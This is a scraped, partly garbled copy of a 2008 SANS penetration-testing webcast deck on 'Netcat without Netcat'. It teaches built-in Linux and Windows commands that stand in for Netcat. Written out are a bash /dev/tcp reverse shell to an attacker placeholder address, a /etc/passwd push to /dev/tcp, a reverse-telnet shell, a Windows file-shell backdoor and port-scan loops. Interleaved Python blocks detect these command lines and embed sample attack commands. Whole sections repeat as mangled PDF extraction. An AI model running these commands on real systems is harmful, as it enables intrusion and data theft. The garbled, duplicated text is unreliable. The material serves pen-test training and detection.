• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9: Las Vegas, NV, Skoudis
  – June 12-July 22: Home On-Line, Skoudis
  – July 24-29: Wash DC, Skoudis
  – Aug 11-16: Boston, Shackleford
  – Aug 18-23: Minneapolis, Conrad
  – Aug 24-29: Va Beach, Strand
• Go to www.sans.org and look for "560" for details


Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008


Useful Netcat Functions

• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows


Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior


Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener


Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

(Diagram: the protected server, behind a firewall that blocks incoming connections, runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; the attacker's machine runs nc -l -p [p], where commands are typed; the commands are executed on the server.)


Linux Command-Line Reverse Shell Backdoor In Action


Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection Refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

(Screenshot caption: Port 80 is listening)


Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers


Command-Line Port Scanner In Action


Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
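For defenders, the Linux techniques in this section (the /dev/tcp file push, the bash -i reverse shell, the echo port probe and its while-loop, and the reverse-telnet pipeline) all show up as recognisable shapes in recorded command lines. The following Python is an added example, not from the original webcast or its author; it classifies command lines from bash history, joined auditd EXECVE argv or an EDR command-line field, and the sample lines and the 10.10.10.5 / 192.168.1.20 addresses are constructed.

```python
"""Classify recorded Linux command lines for the slides' /dev/tcp and reverse-telnet idioms.
  dev-tcp-reverse-shell : an interactive shell (bash -i etc.) with stdio redirected
                          to /dev/tcp/<host>/<port>
  dev-tcp-redirect      : any other redirection to or from /dev/tcp or /dev/udp
                          (file push with cat, single-port probe with echo, the
                          while-loop scanner with a $port variable)
  reverse-telnet        : a pipeline of telnet -> shell -> telnet
The sample lines and addresses below are constructed.
"""
import re
from typing import List, NamedTuple

DEV_NET = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>[^\s;&|)]+)")
# an interactive flag such as '-i' directly after sh/bash/dash/zsh/ksh
INTERACTIVE_SHELL = re.compile(r"(?:^|[\s/])(?:ba|da|z|k)?sh\s+-\S*i", re.I)
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# split a pipeline on single '|' only; '||' is a logical OR, not a pipe
PIPE = re.compile(r"(?<!\|)\|(?!\|)")


class Finding(NamedTuple):
    rule: str
    host: str
    port: str
    command: str


def _basename(word: str) -> str:
    return word.rsplit("/", 1)[-1]


def analyze(cmd: str) -> List[Finding]:
    """Return every finding for one command line (empty list if nothing matches)."""
    findings = []
    interactive = bool(INTERACTIVE_SHELL.search(cmd))
    for m in DEV_NET.finditer(cmd):
        rule = "dev-tcp-reverse-shell" if interactive else "dev-tcp-redirect"
        findings.append(Finding(rule, m.group("host"), m.group("port"), cmd))

    # Reverse telnet: commands arrive on the first telnet's port, are piped into a
    # shell, and the shell's output is piped into a second telnet. Quoting is not
    # honoured here, which is acceptable for a triage heuristic.
    stages = [s.split() for s in PIPE.split(cmd)]
    for a, b, c in zip(stages, stages[1:], stages[2:]):
        if (a and b and c and _basename(a[0]) == "telnet"
                and _basename(b[0]) in SHELLS and _basename(c[0]) == "telnet"):
            host = a[1] if len(a) > 1 else "?"
            port = a[2] if len(a) > 2 else "23"      # telnet's default port
            findings.append(Finding("reverse-telnet", host, port, cmd))
    return findings


def scan(lines) -> List[Finding]:
    return [f for line in lines for f in analyze(line)]


# Constructed sample command lines (not from the original webcast).
SAMPLE_LINES = [
    "cat /etc/passwd > /dev/tcp/10.10.10.5/8080",
    "/bin/bash -i > /dev/tcp/10.10.10.5/4444 0<&1 2>&1",
    "echo > /dev/tcp/192.168.1.20/80",
    "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/192.168.1.20/$port; "
    "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done",
    "telnet 10.10.10.5 2001 | /bin/bash | telnet 10.10.10.5 2002",
    "grep -r tcp /etc/services || echo none",   # benign: no /dev/tcp, '||' is not a pipe
    "ls -la /dev/ | grep tty",                  # benign: pipeline without telnet/shell
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f"{f.rule:22s} {f.host}:{f.port}  <- {f.command}")
```

The while-loop line is reported with the literal port "$port", which is what a defender actually sees in history or argv when the scanner iterates a variable.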


Reverse Telnet Shell in Action


Windows

• The built-in command line has very clunky syntax
• Also, the telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows


Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here


bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38

Follow-Upbull SANS Security 560 Network Penetration Testing

and Ethical Hacking

bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20

bull Discount applies to 560 course through August

ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis

ndash July 24-29 Wash DC Skoudis

ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad

ndash Aug 24-29 Va Beach Strand

bull Go to wwwsansorg and look for ldquo560rdquo for details

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39

Outlinebull Why Penetration Testing

bull Windows Command Line Tips for PenTesters

bull Conclusions

bull QampA

ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008

Page 16: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 16

Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 17

Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

[Diagram: a protected server sits behind a firewall that blocks incoming connections and runs /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1; commands are executed there. The attacker's machine runs nc -l -p [p], and commands are typed there.]

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 18

Linux Command-Line Reverse Shell Backdoor In Action

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 19

Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

[Screenshot: the probe run against a host on which port 80 is listening]

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 20

Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
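Slide 19 observes that the refusal text cannot be redirected to a file from the probe command, and slide 20 therefore relies on $?. This Python harness is an added example, not from the slides: it runs the one-port probe under bash two ways to show the mechanism (bash applies a command's redirections left to right, so a 2> on the same command as the failing /dev/tcp open is never set up, while a 2> on an enclosing brace group is already in place and captures the message). It assumes bash is installed; the probed loopback port is reserved and released first, so it is closed by construction.

```python
"""Why slide 19's "Connection refused" text cannot be redirected on the probe
command itself, and how a brace group changes that.  Added example, not part
of the original slides; it assumes bash is installed.  The probed port is
bound and released on loopback first, so it is closed by construction."""
import socket
import subprocess
import tempfile
from pathlib import Path


def closed_port() -> int:
    """Reserve an ephemeral loopback port and release it; nothing listens
    there afterwards, so a connect() to it is refused."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def probe(host: str, port: int, grouped: bool) -> dict:
    """Run the slide-19 probe under bash and report where the error text went.

    grouped=False:  echo > /dev/tcp/H/P 2>"$1"
        bash performs a command's redirections left to right; the /dev/tcp
        open fails first, so the 2> is never set up and the message lands on
        bash's own stderr (the slide's observation).
    grouped=True:   { echo > /dev/tcp/H/P; } 2>"$1"
        the 2> belongs to the enclosing group and is already in place when
        the inner open fails, so the message is captured in the file.
    """
    inner = f"echo > /dev/tcp/{host}/{port}"
    script = f'{{ {inner}; }} 2>"$1"' if grouped else f'{inner} 2>"$1"'
    with tempfile.TemporaryDirectory() as tmp:
        capture = Path(tmp, "err.txt")
        capture.touch()          # exists even if bash never opens it
        proc = subprocess.run(
            ["bash", "-c", script, "probe", str(capture)],
            capture_output=True, text=True, timeout=10,
        )
        return {
            "exit_status": proc.returncode,   # 0 only when the connect succeeded
            "outer_stderr": proc.stderr,
            "captured": capture.read_text(),
        }


def is_open(host: str, port: int) -> bool:
    """Slide 20's rule: trust $? (the exit status), not the printed text."""
    return probe(host, port, grouped=True)["exit_status"] == 0


if __name__ == "__main__":
    p = closed_port()
    for grouped in (False, True):
        r = probe("127.0.0.1", p, grouped)
        print(f"grouped={grouped}: exit={r['exit_status']} "
              f"outer_stderr={r['outer_stderr']!r} captured={r['captured']!r}")
```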

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 21

Command-Line Port Scanner In Action

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 22

Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 23

Reverse Telnet Shell in Action

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 24

Windows

• Built-in command line has very clunky syntax
• Also, the telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 25

Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 26

Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-] and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 27

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 28

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… it only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says, by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 29

The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 30

Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 31

Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 32

File Transfer in Action

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 33

Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 34

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
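Every one-liner on slides 16 through 34 leaves a distinctive command line in process-creation telemetry, which is what the "Defenders need to be able to interpret attackers' actions" conclusion asks for. This Python scanner is an added example, not from the slides: it applies one regex rule shaped after each technique (the /dev/tcp redirections and reverse telnet of the Linux section, and the telnet/FTP scan loops, share redirection and file shell of the Windows section) to constructed Sysmon/auditd-style command-line records. The rule names, the 192.0.2.x hosts and all sample records are constructed.

```python
"""Spot the deck's "Netcat without Netcat" one-liners in process-creation
telemetry (Sysmon Event ID 1 CommandLine, auditd EXECVE, shell history).
Added example, not part of the original slides: rule names, the 192.0.2.x
hosts (RFC 5737 documentation range) and the sample records are constructed."""
from __future__ import annotations

import re
from typing import Iterable

# One rule per technique the slides show.  The patterns follow the exact
# shapes used in the deck, so they are deliberately narrow; widen with care.
RULES = [
    # Slides 16-20: any bash /dev/tcp redirection (file push, probe, shell)
    ("devtcp_redirect", re.compile(r"/dev/tcp/")),
    # Slide 17: interactive bash with stdout on /dev/tcp and stdin tied to it
    ("devtcp_reverse_shell",
     re.compile(r"bash\s+[-\u2013]i\b.*>\s*/dev/tcp/\S+\s+0[<>]&1")),
    # Slide 22: telnet [host] [port1] | shell | telnet [host] [port2]
    ("reverse_telnet",
     re.compile(r"telnet\s+\S+\s+\d+\s*\|.*\b(?:bash|sh|zsh)\b.*\|\s*telnet\s+\S+\s+\d+")),
    # Slide 26: FOR /L counter driving the telnet client port by port
    ("telnet_scan_loop",
     re.compile(r"for\s+/L\b.*\btelnet\s+\S+\s+%\w", re.I)),
    # Slide 26: wmic deleting telnet.exe on a ping-based timer
    ("telnet_kill_loop",
     re.compile(r'wmic\s+process\s+where\s+name="?telnet\.exe"?\s+delete', re.I)),
    # Slides 29-30: FOR /L counter feeding the ftp client a script file
    ("ftp_script_scan_loop",
     re.compile(r"for\s+/L\b.*\bftp\s+[-\u2013]s:", re.I)),
    # Slides 31 and 34: command output redirected straight onto a UNC share
    ("redirect_to_share",
     re.compile(r">>?\s*\\\\[^\\\s]+\\[^\\\s]+\\")),
    # Slide 33: FOR /F reads a file, cmd /c runs each line, the file is deleted
    ("file_shell",
     re.compile(r'for\s+/f\s+"delims=\^"\s+%(\w)\s+in\s+\((\S+)\)\s+do\s+'
                r'cmd(?:\.exe)?\s+/c\s+%\1\b.*\bdel\s+\2', re.I)),
]

# Constructed telemetry records: (record id, command line as logged).
SAMPLE_RECORDS = [
    ("r1", "cat /etc/passwd > /dev/tcp/192.0.2.10/8080"),
    ("r2", "/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1"),
    ("r3", "telnet 192.0.2.10 8000 | /bin/bash | telnet 192.0.2.10 8001"),
    ("r4", "cmd.exe /c for /L %i in (1,1,1024) do telnet 192.0.2.20 %i"),
    ("r5", 'cmd.exe /c for /L %i in (1,0,2) do wmic process where '
           'name="telnet.exe" delete & ping -n 6 127.0.0.1'),
    ("r6", "cmd.exe /c for /L %i in (1,1,1024) do echo open 192.0.2.20 %i "
           "> ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt"),
    ("r7", r"cmd.exe /c type secrets.txt > \\192.0.2.20\share\secrets.txt"),
    ("r8", 'cmd.exe /c for /L %i in (1,0,2) do (for /f "delims=^" %j in '
           '(commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) '
           '& ping -n 2 127.0.0.1'),
    # benign look-alikes that must stay quiet
    ("b1", "ftp -s:deploy_script.txt"),
    ("b2", "cat /etc/passwd | grep root"),
    ("b3", "cmd.exe /c for /L %i in (1,1,5) do echo %i"),
    ("b4", r"net use \\192.0.2.20\share /u:svc *"),
]


def scan(records: Iterable[tuple[str, str]]) -> dict[str, list[str]]:
    """Return {record id: sorted rule names that fired}; quiet records are
    omitted.  In real telemetry the FOR loop shows up in the parent cmd.exe
    command line, while each iteration also spawns a child ftp.exe or
    telnet.exe; a burst of those children is the complementary signal."""
    hits: dict[str, list[str]] = {}
    for rec_id, cmdline in records:
        fired = sorted(name for name, rx in RULES if rx.search(cmdline))
        if fired:
            hits[rec_id] = fired
    return hits


if __name__ == "__main__":
    for rec_id, rules in scan(SAMPLE_RECORDS).items():
        print(f"{rec_id}: {', '.join(rules)}")
```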

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 35

The File Shell In Action

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 36

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 37

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 38

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home (On-Line): Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand
• Go to www.sans.org and look for "560" for details

Network Pen Testing & Ethical Hacking - ©2008 Ed Skoudis 39

Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008

Page 17: Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17

Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18

Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

